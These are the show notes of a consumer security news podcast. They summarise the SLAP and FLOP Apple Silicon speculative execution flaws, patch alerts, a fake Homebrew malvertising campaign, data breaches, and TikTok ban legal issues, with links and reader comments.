Feedback & Followups
- Updated Advice from Bart: back in 2019 I recommended the anti-malware not-for-profit DNS provider QuadNine (
9.9.9.9) on the NosillaCast, I had been using it on my router since then, but not anymore, their service has been degrading, and it got so bad this week I switched to CloudFlare’s1.1.1.1, if you are using QuadNine and have been having slow internet unexpectedly, consider following suit!
Deep Dive — New Speculative Execution Attacks against Apple Silicon (SLAP & FLOP)
_TL;DR for now, the real-world risks appears to be low, and there is nothing users can do at the moment. Apple are monitoring the situation, so urgent patches may be forthcoming in the future.
Since the infamous Spectre and Meltdown vulnerabilities first brought the concept of speculative execution to our attention way back in 2017 we’ve seen a parade of these kinds of CPU optimisations that can lead to inadvertent data leaks. Most of these bugs have affected Intel CPUs, but there have been some affecting AMD and Apple processors too.
The majority of these vulnerabilities are only a real threat in shared hosting environments, where it’s normal for unrelated processes to share a CPU, and where any cross-process leaks are a really big deal. This has resulted in cloud providers being forced to implement fixes and workarounds that generally result in substantial performance losses per-CPU. For home users the performance trade-offs are generally not worth it because only our stuff should be running on our devices. These bugs hence usually fall into the “if you have malware on your machine …” category.
But, a small subset of these bugs have required urgent patches for everyone, usually provided through OS and/or browser updates because they could be exploited via JavaScript, so just visiting a website could leak sensitive data from your device.
That’s unfortunately the category a pair of newly detailed Apple-specific vulnerabilities fall into.
Security researchers have now publicly disclosed a pair of speculative execution bugs affecting newer Apple Silicon chips which they’ve named SLAP and FLOP because they abuse CPU features named LAP and LOP which predict future memory access calls.
To illustrate the danger the researchers have demonstrated the flaws being used in a browser, with a malicious web page successfully extracting secret information from other open tabs in 10 minutes.
The flaws were responsibly disclosed to Apple last summer, but as of yet there are no patches. Apple have said they are monitoring the situation, and that it has observed no real-world attacks. We can only assume that if real-world attacks emerge Apple will act.
For now, we regular folks just need to sit and wait, knowing we may need to patch urgently sometime in the future.
For high-risk users there is one more concrete suggested action — enable lockdown mode to massively harden the OS in general and Safari in particular (at the cost of functionality!)
Links
- Two Apple Silicon chip flaws could expose your private data to thieves — appleinsider.com/…
- Apple chips can be hacked to leak secrets from Gmail, iCloud, and more — arstechnica.com/…
- Apple chips can leak secrets to hackers; SLAP and FLOP attacks explained — www.intego.com/…
Action Alerts
- iOS 18.3 and macOS Sequoia 15.3 patch first Apple zero-day of 2025 — www.intego.com/…
- Attention Git users: A nasty collection of Git bugs was first found in the GitHub Desktop app, and while most of the bugs are specific to just that one app, which has now been patched, related flaws were found in core Git which may affect some other clients. If your Git app offers you an update, take it! — thehackernews.com/… & www.bleepingcomputer.com/…
- Attention QNAP NAS owers: QNAP fixes six Rsync vulnerabilities in NAS backup, recovery app — www.bleepingcomputer.com/…
Worthy Warnings
- Yet another Malvertising attack, this time targeting a very popular app within our community: Fake Homebrew Google ads target Mac users with malware — www.bleepingcomputer.com/…
- The ad was very convincing and seemed to point to the correct
brew.shdomain, but clicking that ad took users to a perfect clone of the site atbrewe.sh(notice the extrae!) — this site gave users instructions for installing a malicious version of Homebrew - Hat-tip to Allister in the Podfeet Slack for spotting this story first
- Editorial by Bart: in my opinion ad-based search is now so broken that’s just not safe to use anymore. I’ll do a full review on the NosillaCast later in the year, but I now recommend paying for search so as to get 100% ad-free high-quality search. My second annual Kagi renewal came through just this week, so I’ve been living in this world for two years, and I’m now confident saying it’s better than current Google.
- The ad was very convincing and seemed to point to the correct
- Beware, attackers seem to be exploiting the fact that websites often make us do weird things to prove we’re human:
A timely illustration of the dangers of using cloud-hosted LLMs: DeepSeek exposes database with over 1 million chat records — www.bleepingcomputer.com/…
- Prompts often give away a lot of information, be careful what you ask what LLM!
- Apple Intelligence is a notable exception here, unless you explicitly ask it to use ChatGPT your prompts are never shared with anyone, not even Apple!
US parents and students should probably contact their schools to understand whether or not this affects them, and if so, how, because the specific impact varies widely between schools: PowerSchool starts notifying victims of massive data breach — www.bleepingcomputer.com/…
Notable News
- A timely reminder that the NSO Group and their infamous Pegasus spyware are just the most infamous of a while class if companies and apps: Meta Confirms Zero-Click WhatsApp Spyware Attack Targeting 90 Journalists, Activists — thehackernews.com/…
- Further evidence of why we can’t trust cellular networks anymore: RANsacked: Over 100 Security Flaws Found in LTE and 5G Network Implementations — thehackernews.com/…
- The most eye-opening example of the dangers of trusting devices made in adversarial nations I’ve seen in some time: Backdoor found in two healthcare patient monitors, linked to IP in China — www.bleepingcomputer.com/… (US hospitals being asked to disconnect these devices from their networks)
- The US TikTok ban came into effect on the 19th of January (one day before President Trump’s Inauguration) — www.macobserver.com/…
- On the day, TikTok’s service went offline in the US because their US cloud providers Akami & Oracle obeyed the new law. Apple & Google also removed the app from their app stores.
- On his first day in office, President Trump issued an executive order instructing the Department of Justice (DOJ) not to prosecute anyone for breaking the law for the first 75 days.
- The law remained in effect and in place — Executive Orders can’t override duly passed and signed laws (Congress can revoke them, and courts can rule them un-constitutional)
- Akami & Oracle chose to accept this no-prosecution promise, so service resumed in the US
- Apple & Google chose to continue to obey the law, keeping the app out of their stores
- Legal Analysis: Trump’s TikTok Executive Order and the Limits of Executive Non-Enforcement — www.lawfaremedia.org/…
- Non-prosection promises have no legal standing
- Normal Statute of Limitations applies — any administration in the next 5 years could choose to prosecute Akami & Oracle
- The start of the second Trump Presidency has had some notable detrimental effects on cybersecurity
- A good overview of everything that happened in the new administration’s first week: A Tumultuous Week for Federal Cybersecurity Efforts — krebsonsecurity.com/…
- President Trump Pardons Silk Road Creator Ross Ulbricht After 11 Years in Prison — thehackernews.com/… (this news was swamped in all the other pardon news)
- Trump Terminates DHS Advisory Committee Memberships, Disrupting Cybersecurity Review — thehackernews.com/…
- Some good news from the EFF: VICTORY! Federal Court (Finally) Rules Backdoor Searches of 702 Data Unconstitutional — www.eff.org/…
- PayPal to pay $2 million settlement over 2022 data breach — www.bleepingcomputer.com/…
- An interesting detail is the reason for the settlement — not the fact that there was a breach, but that PayPal had failed to implement adequate security practices and adequate staff cybersecurity training (they have made improvements since)
GDPR complaints filed against TikTok, Temu for sending user data to China — www.bleepingcomputer.com/…- Some nice security enhancements
- New Android Identity Check locks settings outside trusted locations — www.bleepingcomputer.com/…
- Google launches customizable Web Store for Enterprise extensions — www.bleepingcomputer.com/… (a powerful new tool for enterprise customers)
- Related: another illustration of the dangers browser plugins pose, and the renewed focus they are getting from attackers and researchers alike: New Syncjacking attack hijacks devices using Chrome extensions — www.bleepingcomputer.com/…
- Bitwarden makes it harder to hack password vaults without MFA — www.bleepingcomputer.com/… (email validation loop on each login without MFA)
- Two nice uses of AI by Microsoft:
- Microsoft tests Edge Scareware Blocker to block tech support scams — www.bleepingcomputer.com/…
- Microsoft Teams phishing attack alerts coming to everyone next month — www.bleepingcomputer.com/…
- A nice reminder that in a cat-and-mouse game the cat scores a lot of wins too: Google blocked 2.36 million risky Android apps from Play Store in 2024 — www.bleepingcomputer.com/…
- A good reminder that playing around with hacking tools is dangerous: Hacker infects 18,000 “script kiddies” with fake malware builder — www.bleepingcomputer.com/…
Top Tips
Excellent advice from Ken Ray: Checklist 408 – Family Passwords and Smishing, Revisited — overcast.fm/…
- Editorial by Bart: I whole-heartedly agree it’s time for family passwords again, the deep-fake threat is no longer hypothetical, it’s very real now, with many victims each day
Palate Cleansers
- From Bart: A fascinating look at a researcher’s work on sabotaging AI’s that hoover up artists work without permission: Freakonomics Radio 619: How to Poison the A.I. Machine — overcast.fm/… (I remain convinced this is fair use, but I empathise with all sides, recommending because it’s an interesting conversation, not because I have a strong opinion one-way-or-the-other)
- From Allison:
Some truly excellent data visualisation work: Almost one in 10 people use the same four-digit PIN — www.abc.net.au/… (based on Have-I-Been-Pwned data, and given an enthusiastic 
by creator Troy Hunt)
Legend
When the textual description of a link is part of the link it is the title of the page being linked to, when the text describing a link is not part of the link it is a description written by Bart.
| Emoji | Meaning |
|---|---|
|
A link to audio content, probably a podcast. |
|
A call to action. |
| flag | The story is particularly relevant to people living in a specific country, or, the organisation the story is about is affiliated with the government of a specific country. |
|
A link to graphical content, probably a chart, graph, or diagram. |
 |
A story that has been over-hyped in the media, or, “no need to light your hair on fire”  |
 |
A link to an article behind a paywall. |
 |
A pinned story, i.e. one to keep an eye on that’s likely to develop into something significant in the future. |
 |
A tip of the hat to thank a member of the community for bringing the story to our attention. |
 |
A link to video content. |
You went to CloudFlare’s 1.1.1.1 service — I would have thought you’d have gone to 1.1.1.3 or 1.1.1.2 for the malware protection…?
Good point @Ferrers — will do a quick follow up next time.